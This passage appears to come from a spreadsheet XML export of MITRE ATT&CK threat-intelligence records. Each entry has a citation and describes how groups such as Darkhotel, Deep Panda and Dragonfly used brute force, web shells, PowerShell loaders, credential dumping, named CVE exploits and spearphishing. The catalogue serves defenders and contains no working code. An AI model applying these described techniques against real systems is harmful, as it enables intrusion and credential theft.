    <t>[DarkHydrus](https://attack.mitre.org/groups/G0079) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002), [Empire](https://attack.mitre.org/software/S0363), and [Cobalt Strike](https://attack.mitre.org/software/S0154).(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>relationship--fd49b386-9455-4a23-b5eb-b673e58b9d3a</t>
  </si>
  <si>
    <t>[DarkVishnya](https://attack.mitre.org/groups/G0105) used brute-force attack to obtain login data.(Citation: Securelist DarkVishnya Dec 2018)</t>
  </si>
  <si>
    <t>relationship--5a9197b3-c5fb-4288-9fdf-684fa289435b</t>
  </si>
  <si>
    <t>[DarkVishnya](https://attack.mitre.org/groups/G0105) used Bash Bunny, Raspberry Pi, netbooks or inexpensive laptops to connect to the company’s local network.(Citation: Securelist DarkVishnya Dec 2018)</t>
  </si>
  <si>
    <t>relationship--04d1a31c-97c2-4cdd-8fb7-391c984e2fad</t>
  </si>
  <si>
    <t>[DarkVishnya](https://attack.mitre.org/groups/G0105) performed port scanning to obtain the list of active services.(Citation: Securelist DarkVishnya Dec 2018)</t>
  </si>
  <si>
    <t>relationship--3778dc3a-14b2-43e9-8e37-d1c3c731b390</t>
  </si>
  <si>
    <t>[DarkVishnya](https://attack.mitre.org/groups/G0105) scanned the network for public shared folders.(Citation: Securelist DarkVishnya Dec 2018)</t>
  </si>
  <si>
    <t>relationship--3a31f8c0-36bf-40b5-90d2-d03c72b2c8d8</t>
  </si>
  <si>
    <t>[DarkVishnya](https://attack.mitre.org/groups/G0105) used network sniffing to obtain login data. (Citation: Securelist DarkVishnya Dec 2018)</t>
  </si>
  <si>
    <t>relationship--c2ba1f7a-1951-47df-855b-3f42a60a9901</t>
  </si>
  <si>
    <t>[DarkVishnya](https://attack.mitre.org/groups/G0105) used ports 5190 and 7900 for shellcode listeners, and 4444, 4445, 31337 for shellcode C2.(Citation: Securelist DarkVishnya Dec 2018)</t>
  </si>
  <si>
    <t>relationship--ca38f31f-3551-49e3-835b-588693a8b512</t>
  </si>
  <si>
    <t>[DarkVishnya](https://attack.mitre.org/groups/G0105) used PowerShell to create shellcode loaders.(Citation: Securelist DarkVishnya Dec 2018)</t>
  </si>
  <si>
    <t>relationship--bff00753-95ef-4a13-96fa-963365520573</t>
  </si>
  <si>
    <t>[DarkVishnya](https://attack.mitre.org/groups/G0105) used DameWare Mini Remote Control for lateral movement.(Citation: Securelist DarkVishnya Dec 2018)</t>
  </si>
  <si>
    <t>relationship--96934e69-6d38-4ebd-970d-3d9bf88e03e3</t>
  </si>
  <si>
    <t>[DarkVishnya](https://attack.mitre.org/groups/G0105) has obtained and used tools such as [Impacket](https://attack.mitre.org/software/S0357), [Winexe](https://attack.mitre.org/software/S0191), and [PsExec](https://attack.mitre.org/software/S0029).(Citation: Securelist DarkVishnya Dec 2018)</t>
  </si>
  <si>
    <t>relationship--0b3809c3-78a5-4121-9b51-64a9dfa60b11</t>
  </si>
  <si>
    <t>[DarkVishnya](https://attack.mitre.org/groups/G0105) created new services for shellcode loaders distribution.(Citation: Securelist DarkVishnya Dec 2018)</t>
  </si>
  <si>
    <t>relationship--12dcf7c0-4f6b-4eb1-9317-3337822ecbe1</t>
  </si>
  <si>
    <t>G0012</t>
  </si>
  <si>
    <t>Darkhotel</t>
  </si>
  <si>
    <t>intrusion-set--9e729a7e-0dd6-4097-95bf-db8d64911383</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</si>
  <si>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</si>
  <si>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relationship--b69424ec-3af6-44aa-842a-81fba219b9f4</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has decrypted strings and imports using RC4 during execution.(Citation: Securelist Darkhotel Aug 2015)(Citation: Microsoft DUBNIUM July 2016)</t>
  </si>
  <si>
    <t>relationship--4b3f0b38-d4e2-49e8-a8f9-6a186c31967f</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) used embedded iframes on hotel login portals to redirect selected victims to download malware.(Citation: Kaspersky Darkhotel)</t>
  </si>
  <si>
    <t>relationship--4f62c818-2129-4dc2-9f80-105412df4b1d</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has exploited Adobe Flash vulnerability CVE-2015-8651 for execution.(Citation: Microsoft DUBNIUM June 2016)</t>
  </si>
  <si>
    <t>relationship--e1bcdc6c-771a-4606-b7f4-cdfbef5efc34</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has used malware that searched for files with specific patterns.(Citation: Microsoft DUBNIUM July 2016)</t>
  </si>
  <si>
    <t>relationship--bfc84868-c168-4db4-be39-641cfab0619a</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has used first-stage payloads that download additional malware from C2 servers.(Citation: Microsoft DUBNIUM June 2016)</t>
  </si>
  <si>
    <t>relationship--cdfe5f64-0a34-483c-b921-feaf18357354</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has used a keylogger.(Citation: Kaspersky Darkhotel)</t>
  </si>
  <si>
    <t>relationship--37c94531-1e56-4640-93fd-e9fd65da4f80</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has sent spearphishing emails in an attempt to lure users into clicking on a malicious attachments.(Citation: Securelist Darkhotel Aug 2015)(Citation: Microsoft DUBNIUM July 2016)</t>
  </si>
  <si>
    <t>relationship--e936d8c6-f069-49b1-8d4e-9ecafab2a576</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has used malware that is disguised as a Secure Shell (SSH) tool.(Citation: Microsoft DUBNIUM June 2016)</t>
  </si>
  <si>
    <t>relationship--c5fd969c-7fda-4f3a-9f54-1f1455f14956</t>
  </si>
  <si>
    <t>21 April 2021</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has obfuscated code using RC4, XOR, and RSA.(Citation: Securelist Darkhotel Aug 2015)(Citation: Microsoft DUBNIUM July 2016)</t>
  </si>
  <si>
    <t>relationship--1330d8a5-c8be-4579-8a91-4cfda860ea0a</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) malware can collect a list of running processes on a system.(Citation: Securelist Darkhotel Aug 2015)</t>
  </si>
  <si>
    <t>relationship--48649215-087c-4ded-925c-f2c3f57dcba1</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has been known to establish persistence by adding programs to the Run Registry key.(Citation: Kaspersky Darkhotel)</t>
  </si>
  <si>
    <t>relationship--d021d378-a5ff-4020-972c-cc9152e824b0</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012)'s selective infector modifies executables stored on removable media as a method of spreading across computers.(Citation: Kaspersky Darkhotel)</t>
  </si>
  <si>
    <t>relationship--5bad7b38-36b5-4208-9895-e4a113c511a3</t>
  </si>
  <si>
    <t xml:space="preserve">[Darkhotel](https://attack.mitre.org/groups/G0012) has searched for anti-malware strings and anti-virus processes running on the system.(Citation: Securelist Darkhotel Aug 2015)(Citation: Microsoft DUBNIUM June 2016) </t>
  </si>
  <si>
    <t>relationship--02052736-4888-47b0-9eb4-4031a4061998</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has sent spearphishing emails with malicious RAR and .LNK attachments.(Citation: Securelist Darkhotel Aug 2015)(Citation: Microsoft DUBNIUM July 2016)</t>
  </si>
  <si>
    <t>relationship--3cce0cb1-051f-48da-8712-e9d2eba871a0</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has used AES-256 and 3DES for C2 communications.(Citation: Microsoft DUBNIUM July 2016)</t>
  </si>
  <si>
    <t>relationship--1e05bf60-ac1b-4497-a9bc-55eff65cf927</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</si>
  <si>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</si>
  <si>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relationship--8395d178-d5e8-494f-8612-3c2542b2f8c9</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has collected the hostname, OS version, service pack version, and the processor architecture from the victim’s machine.(Citation: Securelist Darkhotel Aug 2015)(Citation: Microsoft DUBNIUM July 2016)</t>
  </si>
  <si>
    <t>relationship--2c44970b-616d-401e-b9ed-72ac39ca5709</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has collected the IP address and network adapter information from the victim’s machine.(Citation: Securelist Darkhotel Aug 2015)(Citation: Microsoft DUBNIUM July 2016)</t>
  </si>
  <si>
    <t>relationship--ba18af0c-8b4d-4be0-9b62-f29207856ea9</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) malware can obtain system time from a compromised host.(Citation: Lastline DarkHotel Just In Time Decryption Nov 2015)</t>
  </si>
  <si>
    <t>relationship--9158696f-fdc6-4869-a395-5d94c7c13d26</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) used a virus that propagates by infecting executables stored on shared drives.(Citation: Kaspersky Darkhotel)</t>
  </si>
  <si>
    <t>relationship--27b05a62-5310-40d9-9e49-b4dce3afad55</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has used malware that repeatedly checks the mouse cursor position to determine if a real user is on the system.(Citation: Lastline DarkHotel Just In Time Decryption Nov 2015)</t>
  </si>
  <si>
    <t>relationship--118b2047-826a-4ab0-94b8-69d35a4c8592</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) malware has employed just-in-time decryption of strings to evade sandbox detection.(Citation: Lastline DarkHotel Just In Time Decryption Nov 2015)</t>
  </si>
  <si>
    <t>relationship--7cc93842-6c19-4d5c-8e9b-81dfa58e859e</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) has dropped an mspaint.lnk shortcut to disk which launches a shell script that downloads and executes a file.(Citation: Securelist Darkhotel Aug 2015)</t>
  </si>
  <si>
    <t>relationship--c4995d4f-2b7e-439f-afb1-a4c9218c7a08</t>
  </si>
  <si>
    <t>[Deep Panda](https://attack.mitre.org/groups/G0009) has used the sticky-keys technique to bypass the RDP login screen on remote systems during intrusions.(Citation: RSA Shell Crew)</t>
  </si>
  <si>
    <t>relationship--ab069468-3dff-4c77-9293-adb0b2627a4e</t>
  </si>
  <si>
    <t>17 April 2020</t>
  </si>
  <si>
    <t>[Deep Panda](https://attack.mitre.org/groups/G0009) has used &lt;code&gt;-w hidden&lt;/code&gt; to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows by setting the WindowStyle parameter to hidden. (Citation: Alperovitch 2014)</t>
  </si>
  <si>
    <t>relationship--673bf715-0ccc-48fd-93b5-570b417cc41a</t>
  </si>
  <si>
    <t>[Deep Panda](https://attack.mitre.org/groups/G0009) has updated and modified its malware, resulting in different hash values that evade detection.(Citation: Symantec Black Vine)</t>
  </si>
  <si>
    <t>relationship--4d68b3eb-9689-4a6d-b6ab-367fbc5ddade</t>
  </si>
  <si>
    <t>[Deep Panda](https://attack.mitre.org/groups/G0009) has used PowerShell scripts to download and execute programs in memory, without writing to disk.(Citation: Alperovitch 2014)</t>
  </si>
  <si>
    <t>relationship--6fdc3210-9754-4157-b386-8fcd680e732c</t>
  </si>
  <si>
    <t>[Deep Panda](https://attack.mitre.org/groups/G0009) uses the Microsoft [Tasklist](https://attack.mitre.org/software/S0057) utility to list processes running on systems.(Citation: Alperovitch 2014)</t>
  </si>
  <si>
    <t>relationship--1fbf92c8-747b-4c0f-ab33-ce63cbff8197</t>
  </si>
  <si>
    <t>[Deep Panda](https://attack.mitre.org/groups/G0009) has used regsvr32.exe to execute a server variant of [Derusbi](https://attack.mitre.org/software/S0021) in victim networks.(Citation: RSA Shell Crew)</t>
  </si>
  <si>
    <t>relationship--4fab8d06-e6fb-472f-91ee-f2fd29ef444e</t>
  </si>
  <si>
    <t>[Deep Panda](https://attack.mitre.org/groups/G0009) has used ping to identify other machines of interest.(Citation: Alperovitch 2014)</t>
  </si>
  <si>
    <t>relationship--280bb6ec-0d7f-4a42-a3f2-7a3b43886126</t>
  </si>
  <si>
    <t>[Deep Panda](https://attack.mitre.org/groups/G0009) uses net.exe to connect to network shares using &lt;code&gt;net use&lt;/code&gt; commands with compromised credentials.(Citation: Alperovitch 2014)</t>
  </si>
  <si>
    <t>relationship--f43ab4db-5dea-4a1f-977a-f5d779330193</t>
  </si>
  <si>
    <t>[Deep Panda](https://attack.mitre.org/groups/G0009) uses Web shells on publicly accessible Web servers to access victim networks.(Citation: CrowdStrike Deep Panda Web Shells)</t>
  </si>
  <si>
    <t>relationship--44f230bb-b59a-4f30-8203-5e5ffd9796f5</t>
  </si>
  <si>
    <t>The [Deep Panda](https://attack.mitre.org/groups/G0009) group is known to utilize WMI for lateral movement.(Citation: Alperovitch 2014)</t>
  </si>
  <si>
    <t>relationship--d295beee-439c-44f9-9908-4cb194331de9</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has added newly created accounts to the administrators group to maintain elevated access.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--a8ad10f7-be41-4fb7-805b-f3b227e56b26</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has compressed data into .zip files prior to exfiltration.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--0082e86b-a7b7-496b-af03-88785b6c8fbb</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has attempted to brute force credentials to gain access.(Citation: CISA AA20-296A Berserk Bear December 2020)</t>
  </si>
  <si>
    <t>relationship--d9bdae16-d3b3-4260-b1ef-2624cf4e836c</t>
  </si>
  <si>
    <t>10 December 2021</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has collected open source information to identify relationships between organizations for targeting purposes.(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>relationship--16d72046-2569-4517-9a8f-c9f4377df7ab</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has cleared Windows event logs and other logs produced by tools they used, including system, security, terminal services, remote services, and audit logs. The actors also deleted specific Registry keys.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--6a8f9492-678f-42c7-8f61-a335c78ee85c</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has used the command line for execution.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--769a2214-5e04-4290-a172-b770f8bb223e</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has placed trojanized installers for control system software on legitimate vendor app stores.(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>relationship--9c3ada08-1908-4458-a454-d91fda25ad04</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has collected data from local victim systems.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--6f54be53-193e-49c0-aa8e-2b24caf436fd</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has disabled host-based firewalls. The group has also globally opened port 3389.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--478e9268-e91a-4777-a4ee-644be4cd9fd0</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has used batch scripts to enumerate users on a victim domain controller.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--fa6f9dc7-e984-411a-9ce4-a822d4213bc6</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has used batch scripts to enumerate administrators and users in the domain.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--c0a0d653-ff95-4c77-a129-c7f3398a56ca</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has registered domains for targeting intended victims.(Citation: CISA AA20-296A Berserk Bear December 2020)</t>
  </si>
  <si>
    <t>relationship--62478274-7562-414a-9b03-f155f5a0d80b</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has compromised targets via strategic web compromise (SWC) utilizing a custom exploit kit.(Citation: Secureworks IRON LIBERTY July 2019)(Citation: US-CERT TA18-074A)(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>relationship--5253d038-08a8-4d17-9549-bbcf67c37603</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has compromised websites to redirect traffic and to host exploit kits.(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>relationship--461ddc5d-889d-4879-ade3-27ff78d7e442</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has conducted SQL injection attacks, exploited vulnerabilities CVE-2019-19781 and CVE-2020-0688 for Citrix and MS Exchange, and CVE-2018-13379 for Fortinet VPNs.(Citation: CISA AA20-296A Berserk Bear December 2020)</t>
  </si>
  <si>
    <t>relationship--d06cd799-f61b-460e-a287-e58e8ff39022</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has exploited CVE-2011-0611 in Adobe Flash Player to gain execution on a targeted system.(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>relationship--2ecdcdb3-6aa2-4888-921f-e9506ebbd00c</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has exploited a Windows Netlogon vulnerability (CVE-2020-1472) to obtain access to Windows Active Directory servers.(Citation: CISA AA20-296A Berserk Bear December 2020)</t>
  </si>
  <si>
    <t>relationship--f2aa88d9-852b-4932-9881-d9c6f5d89779</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has used VPNs and Outlook Web Access (OWA) to maintain access to victim networks.(Citation: US-CERT TA18-074A)(Citation: CISA AA20-296A Berserk Bear December 2020)</t>
  </si>
  <si>
    <t>relationship--cc6b3d5d-f77d-4c83-b484-1f2516133950</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has deleted many of its files used during operations as part of cleanup, including removing applications and deleting screenshots.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--71de7fd6-177c-4964-9f2b-eec22937fded</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has used SMB for C2.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--bac1d1a4-14f7-4f68-8035-e322e94f92c9</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has used a batch script to gather folder and file names from victim hosts.(Citation: US-CERT TA18-074A)(Citation: Gigamon Berserk Bear October 2021)(Citation: CISA AA20-296A Berserk Bear December 2020)</t>
  </si>
  <si>
    <t>relationship--21382ce2-a504-4adf-81d2-dc1306285553</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</si>
  <si>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</si>
  <si>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relationship--db7707d7-5334-47b3-b203-0ee4fcbae5e9</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has modified the Registry to hide created user accounts.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--0ec90a7b-2ba7-4d7e-ac41-c5fdcf9e8046</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has copied and installed tools for operations once in the victim environment.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--cb54c094-5614-4d45-ab13-c00ab2cdb114</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has dropped and executed SecretsDump to dump password hashes.(Citation: US-CERT TA18-074A)(Citation: Core Security Impacket)</t>
  </si>
  <si>
    <t>relationship--cd849a7c-f63a-4157-b4c9-9385115da08a</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has created accounts on victims, including administrator accounts, some of which appeared to be tailored to each individual staging target.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--23df34a9-9705-4efa-9f8f-90f4bcb1a310</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has created a directory named "out" in the user's %AppData% folder and copied files to it.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--e15a2065-49a7-435f-b9ad-b45c4906aa74</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has used various forms of spearphishing in attempts to get users to open malicious attachments.(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>relationship--14dbc3a9-5e47-454a-805c-b8e22659362f</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has created accounts disguised as legitimate backup and service accounts as well as an email administration account.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--a0d99ee4-f154-42a0-8984-8e76d3e155c9</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has modified the Registry to perform multiple techniques through the use of [Reg](https://attack.mitre.org/software/S0075).(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--99c360a2-7395-46e4-88fc-dbd757bed5bf</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has dropped and executed SecretsDump to dump password hashes. They also obtained ntds.dit from domain controllers.(Citation: US-CERT TA18-074A)(Citation: Core Security Impacket)</t>
  </si>
  <si>
    <t>relationship--a291d185-31c8-4458-a3fc-9af617af28d9</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has identified and browsed file servers in the victim network, sometimes , viewing files pertaining to ICS or Supervisory Control and Data Acquisition (SCADA) systems.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--d2f19ee3-8e1c-46e4-b803-e8b3fa36f62e</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has dropped and executed tools used for password cracking, including Hydra and [CrackMapExec](https://attack.mitre.org/software/S0488).(Citation: US-CERT TA18-074A)(Citation: Kali Hydra)</t>
  </si>
  <si>
    <t>relationship--3e4e4075-1731-47b5-b95f-7e0b916556d5</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has used PowerShell scripts for execution.(Citation: US-CERT TA18-074A)(Citation: Symantec Dragonfly Sept 2017)</t>
  </si>
  <si>
    <t>relationship--f24cbdeb-cf7b-43d9-87b0-9ab10ba74b60</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has used various types of scripting to perform operations, including Python scripts. The group was observed installing Python 2.7 on a victim.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--f35c994e-80a6-414a-ab81-1a2eb5fd0829</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has queried the Registry to identify victim information.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--4d5240d1-508f-4cf0-bf38-9f9276894cbf</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has added the registry value ntdll to the Registry Run key to establish persistence.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--c6d4f484-bb75-4012-b756-f043e962aaa6</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has moved laterally via RDP.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--db5bc5e2-fb3d-42a7-8fbc-b0aff2be6f8f</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has accessed email accounts using Outlook Web Access.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--c4f902df-4b79-4bf7-b4b3-5873a316795b</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has likely obtained a list of hosts in the victim environment.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--f5362c13-271a-486c-8665-996367599fd8</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has used scheduled tasks to automatically log out of created accounts every 8 hours as well as to execute malicious files.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--bed23143-48a0-4883-ae33-416d60c27b5d</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has performed screen captures of victims, including by using a tool, scr.exe (which matched the hash of ScreenUtil).(Citation: US-CERT TA18-074A)(Citation: Symantec Dragonfly Sept 2017)(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>relationship--08b30f76-ca12-4d2c-9345-ee51bfd54e9f</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has dropped and executed SecretsDump to dump password hashes.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--63759a0f-39e8-4d94-ab20-3bdba67ca502</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has compromised legitimate websites to host C2 and malware modules.(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>relationship--20aaed95-65ce-4a0f-9e25-4a4156889a84</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has sent emails with malicious attachments to gain initial access.(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>relationship--509eddb7-b86f-4831-953f-15017b5d987e</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has used spearphishing with Microsoft Office attachments to enable harvesting of user credentials.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--6385d0af-765c-44f9-afab-ed3852f6a22f</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has used spearphishing with PDF attachments containing malicious links that redirected to credential harvesting websites.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--bd2f28c5-7687-4d74-b3ad-42d2d62e4548</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has used batch scripts to enumerate network information, including information about trusts, zones, and the domain.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--1aa94645-05e8-40ce-b8b7-c83a4e03d4e2</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) used the command &lt;code&gt;query user&lt;/code&gt; on victim hosts.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--e13ba463-59c5-4e50-9aeb-420ab5e677db</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has injected SMB URLs into malicious Word spearphishing attachments to initiate [Forced Authentication](https://attack.mitre.org/techniques/T1187).(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--26c62507-1a2b-4235-b80c-d5f7f52d1c95</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002), [CrackMapExec](https://attack.mitre.org/software/S0488), and [PsExec](https://attack.mitre.org/software/S0029).(Citation: Secureworks IRON LIBERTY July 2019)</t>
  </si>
  <si>
    <t>relationship--9b363538-86e1-446a-a4f8-b3045a7e8f68</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has compromised user credentials and used valid accounts for operations.(Citation: US-CERT TA18-074A)(Citation: Gigamon Berserk Bear October 2021)(Citation: CISA AA20-296A Berserk Bear December 2020)</t>
  </si>
  <si>
    <t>relationship--1896ca51-adf4-4a3b-be89-1aae18465741</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has acquired VPS infrastructure for use in malicious campaigns.(Citation: Gigamon Berserk Bear October 2021)</t>
  </si>
  <si>
    <t>relationship--ae28ef39-1e4f-41e5-9ffa-877030753852</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has scanned targeted systems for vulnerable Citrix and Microsoft Exchange services.(Citation: CISA AA20-296A Berserk Bear December 2020)</t>
  </si>
  <si>
    <t>relationship--c5d4cfac-aa9a-4dfb-a991-e81f70a937e2</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has commonly created Web shells on victims' publicly accessible email and web servers, which they used to maintain access to a victim network and download additional malicious files.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--103489a6-af80-4d4d-8aa7-ca973713e8da</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) has used various types of scripting to perform operations, including batch scripts.(Citation: US-CERT TA18-074A)</t>
  </si>
  <si>
    <t>relationship--b8b1f3a0-0202-4a2e-a234-f181d45d683a</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has registered domains to spoof targeted organizations by changing the top-level domain (TLD) to “.us”, “.co” or “.biz”.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>relationship--b73144e0-3101-4631-9bdc-4e74a9a7d278</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has created e-mail accounts to spoof targeted organizations.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>relationship--88d72a6e-091f-48ff-9ad4-fd05d748d956</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has gathered targeted individuals' e-mail addresses through open source research and website contact forms.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
